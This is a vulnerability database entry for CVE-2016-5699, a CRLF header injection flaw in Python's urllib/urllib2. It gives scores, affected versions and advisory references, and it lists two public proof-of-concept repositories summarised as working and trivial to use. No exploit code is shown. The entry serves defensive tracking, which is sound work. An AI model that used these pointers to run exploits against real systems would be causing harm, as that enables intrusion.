CVE-2016-5699

MEDIUM

CPython < 2.7.9 - HTTP Header Injection via CRLF Sequences in HTTPConnection.putheader

Title source: manual
STIX 2.1

Exploitation Summary

EIP tracks 2 public exploits for CVE-2016-5699. PoCs published by bunseokbot, shajinzheng.

AI-analyzed exploit summary This repository contains a functional PoC for CVE-2016-5699, demonstrating HTTP header injection via a Python script (`poc.py`) that sends requests to a Flask-based receiver (`receiver.py`) to display headers. The exploit leverages improper handling of HTTP headers to inject malicious content.

Description

CRLF injection vulnerability in the HTTPConnection.putheader function in urllib2 and urllib in CPython (aka Python) before 2.7.10 and 3.x before 3.4.4 allows remote attackers to inject arbitrary HTTP headers via CRLF sequences in a URL.

Exploits (2)

nomisec WORKING POC 4 stars
by bunseokbot · poc
https://github.com/bunseokbot/CVE-2016-5699-poc

This repository contains a functional PoC for CVE-2016-5699, demonstrating HTTP header injection via a Python script (`poc.py`) that sends requests to a Flask-based receiver (`receiver.py`) to display headers. The exploit leverages improper handling of HTTP headers to inject malicious content.

Classification
Working Poc 90%
Attack Type
Other
Complexity
Trivial
Reliability
Reliable
Target: HTTP servers vulnerable to header injection (e.g., Apache Traffic Server, other proxies)
No auth needed
Prerequisites: Network access to the target server · Target server vulnerable to HTTP header injection
devstral-2 · analyzed Feb 18, 2026 Full analysis →
nomisec WORKING POC
by shajinzheng · poc
https://github.com/shajinzheng/cve-2016-5699-jinzheng-sha

This repository contains a functional PoC for CVE-2016-5699, an HTTP header injection vulnerability in Python's urllib2 library. The exploit demonstrates how crafted URLs with CRLF sequences can inject arbitrary headers into HTTP requests.

Classification
Working Poc 95%
Attack Type
Info Leak
Complexity
Trivial
Reliability
Reliable
Target: Python urllib2 library (versions before 2.7.10)
No auth needed
Prerequisites: Python environment with vulnerable urllib2 version · Network access to target server
devstral-2 · analyzed Feb 18, 2026 Full analysis →

References (19)

Core 19
Core References
Various Sources x_refsource_confirm
http://www.splunk.com/view/SP-CAAAPUE
Vendor Advisory vendor-advisory x_refsource_redhat
http://rhn.redhat.com/errata/RHSA-2016-1630.html
Vendor Advisory vendor-advisory x_refsource_redhat
http://rhn.redhat.com/errata/RHSA-2016-1627.html
Vendor Advisory vendor-advisory x_refsource_redhat
http://rhn.redhat.com/errata/RHSA-2016-1629.html
Various Sources x_refsource_confirm
http://www.splunk.com/view/SP-CAAAPSV
Mailing List mailing-list x_refsource_mlist
http://www.openwall.com/lists/oss-security/2016/06/16/2
Mailing List mailing-list x_refsource_mlist
https://lists.debian.org/debian-lts-announce/2019/02/msg00011.html
Mailing List mailing-list x_refsource_mlist
http://www.openwall.com/lists/oss-security/2016/06/15/12
Mailing List mailing-list x_refsource_mlist
http://www.openwall.com/lists/oss-security/2016/06/14/7
Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/91226
Vendor Advisory vendor-advisory x_refsource_redhat
http://rhn.redhat.com/errata/RHSA-2016-1628.html
Vendor Advisory vendor-advisory x_refsource_redhat
http://rhn.redhat.com/errata/RHSA-2016-1626.html

Scores

CVSS v3 6.1
EPSS 0.0989
EPSS Percentile 94.9%
Attack Vector NETWORK
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Details

CWE
CWE-113
Status published
Products (27)
python/python 3.0
python/python 3.0.1
python/python 3.1.0
python/python 3.1.1
python/python 3.1.2
python/python 3.1.3
python/python 3.1.4
python/python 3.1.5
python/python 3.2.0
python/python 3.2.1
... and 17 more
Published Sep 02, 2016
Tracked Since Feb 18, 2026